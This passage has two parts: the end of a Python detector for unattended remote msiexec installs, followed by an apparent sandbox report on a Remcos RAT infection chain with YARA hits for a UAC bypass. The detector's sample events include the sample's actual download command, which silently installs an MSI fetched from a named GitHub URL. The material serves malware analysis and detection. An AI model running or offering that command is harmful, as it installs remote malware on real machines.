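# records 1-3 are benign controls made up for the example (record 3 reuses
# the WerFault line from the report, which must not trigger).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'"C:\Windows\System32\msiexec.exe" /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi /qn'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'"C:\Windows\System32\msiexec.exe" /i C:\Users\user\Downloads\tool.msi'},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"C:\Windows\system32\msiexec.exe /V"},
    {"ParentImage": r"C:\Users\user\AppData\Local\Temp\Updwork.exe",
     "Image": r"C:\Windows\SysWOW64\WerFault.exe",
     "CommandLine": r'"C:\Windows\System32\WerFault.exe"'},
]

# Parents from which an unattended install of a remote package is rarely legitimate
# (assumption: tune to the environment; the report itself only shows wscript.exe).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}

# msiexec accepts '/' or '-' switches; /i (or /package) followed by an http(s) URL
# makes the Windows Installer service fetch the package over the network itself.
REMOTE_PKG = re.compile(r'(?i)(?:^|\s)[/-](?:i|package)\s+"?(https?://\S+?)"?(?:\s|$)')
# Quiet/passive UI levels documented for msiexec; /qn is the one seen in the report.
QUIET = re.compile(r'(?i)(?:^|\s)[/-](?:qn|qb|q|quiet|passive)(?:\s|$)')


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_msiexec(event):
    """Return (severity, package_url) for a remote msiexec install, else None."""
    if _basename(event["Image"]) != "msiexec.exe":
        return None
    cmd = event["CommandLine"]
    m = REMOTE_PKG.search(cmd)
    if m is None:
        return None  # local package path or service/maintenance invocation
    url = m.group(1)
    quiet = QUIET.search(cmd) is not None
    scripted = _basename(event["ParentImage"]) in SCRIPT_HOSTS
    if scripted and quiet:
        return ("high", url)   # script host + unattended + remote: the chain in this report
    if scripted or quiet:
        return ("medium", url)
    return ("low", url)        # remote package, but interactive and from an ordinary parent


def find_remote_msi_installs(events):
    """List (severity, url, parent image) for every event classify_msiexec flags."""
    hits = []
    for ev in events:
        verdict = classify_msiexec(ev)
        if verdict:
            hits.append((verdict[0], verdict[1], ev["ParentImage"]))
    return hits


if __name__ == "__main__":
    for sev, url, parent in find_remote_msi_installs(SAMPLE_EVENTS):
        print(f"{sev}: {parent} launched msiexec against {url}")
```

The URL check is the load-bearing part: a local package path under a script-host parent is common in deployment scripts, whereas a package that msiexec fetches from a public code-hosting URL and installs without UI is the pattern this sample used to pull its second stage.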
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_62E86020 NtProtectVirtualMemory,NtProtectVirtualMemory
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_004016E0 GetCommandLineW,OpenSCManagerW,wcsstr,OpenServiceW,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIACD9.tmp
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3BAC.tmp
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3C2A.tmp
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3C5A.tmp
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3C7A.tmp
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                      Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3CC9.tmp
                      Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSI3BAC.tmp
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_204660B0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_20413950
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_2041C9A0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_204211A0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_20403A70
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_20464B40
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_20405C10
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_20462D50
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_2041AD00
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_20405DB0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_2040EE60
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_204276C0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_204677F0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_204157B0
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_00404A44
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_00406F54
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_0040677D
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_62E81A10
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_62E8AB40
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_62E8770C
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_62E83704
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_62E818B8
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_62E91420
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_204660B0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_20413950
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_2041C9A0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_204211A0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_20403A70
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_20464B40
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_20405C10
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_20462D50
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_20405DB0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_2040EE60
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_204276C0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_20464FC0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_204677F0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_204157B0
                      Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe EFFA6FCB8759375B4089CCF61202A5C63243F4102872E64E3EB0A1BDC2727659
                      Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dll A91F13AECE1EA7EBE326F0E340BDA9D00613D3365CD81B7F138A4C9446FFBD38
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: String function: 20402000 appears 58 times
                      Source: secondaryTask.vbs | Initial sample: Strings found which are bigger than 50
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Process created: C:\Windows\SysWOW64\WerFault.exe "C:\Windows\System32\WerFault.exe"
                      Source: zlib1.dll.7.dr | Static PE information: Number of sections : 11 > 10
                      Source: 8.2.cmd.exe.33007f8.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.cmd.exe.3302800.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 29.2.EHttpSrv.exe.242d2e4.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 30.2.cmd.exe.4c22f90.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 29.2.EHttpSrv.exe.240ba18.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 25.2.cmd.exe.4b6f6c4.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 15.2.EHttpSrv.exe.23bbee4.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 15.2.EHttpSrv.exe.23bb2e4.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 23.2.EHttpSrv.exe.25a7b90.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 16.2.cmd.exe.5015f90.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.cmd.exe.5294b90.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 15.2.EHttpSrv.exe.2399a18.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 25.2.cmd.exe.4b91b90.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.EHttpSrv.exe.2367ee4.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 6.2.EHttpSrv.exe.23e12e4.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.EHttpSrv.exe.2345a18.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 6.2.EHttpSrv.exe.23bfa18.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 23.2.EHttpSrv.exe.25856c4.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 23.2.EHttpSrv.exe.25a6f90.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 16.2.cmd.exe.5016b90.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 25.2.cmd.exe.2c007f8.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 6.2.EHttpSrv.exe.23e1ee4.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 32.2.EHttpSrv.exe.24f9b90.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 30.2.cmd.exe.4c016c4.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.EHttpSrv.exe.23672e4.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 32.2.EHttpSrv.exe.24f8f90.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 29.2.EHttpSrv.exe.242dee4.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.cmd.exe.33007f8.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 25.2.cmd.exe.4b90f90.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 32.2.EHttpSrv.exe.24d76c4.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.cmd.exe.5293f90.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.cmd.exe.52726c4.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 30.2.cmd.exe.4c23b90.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 25.2.cmd.exe.2bd4848.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 16.2.cmd.exe.4ff46c4.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000020.00000002.3108485798.000000000047B000.00000004.00000001.01000000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000017.00000002.2755264970.000000000047B000.00000004.00000001.01000000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: cmd.exe PID: 5672, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: EHttpSrv.exe PID: 6336, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: cmd.exe PID: 3260, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: EHttpSrv.exe PID: 6104, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPED | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPED | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
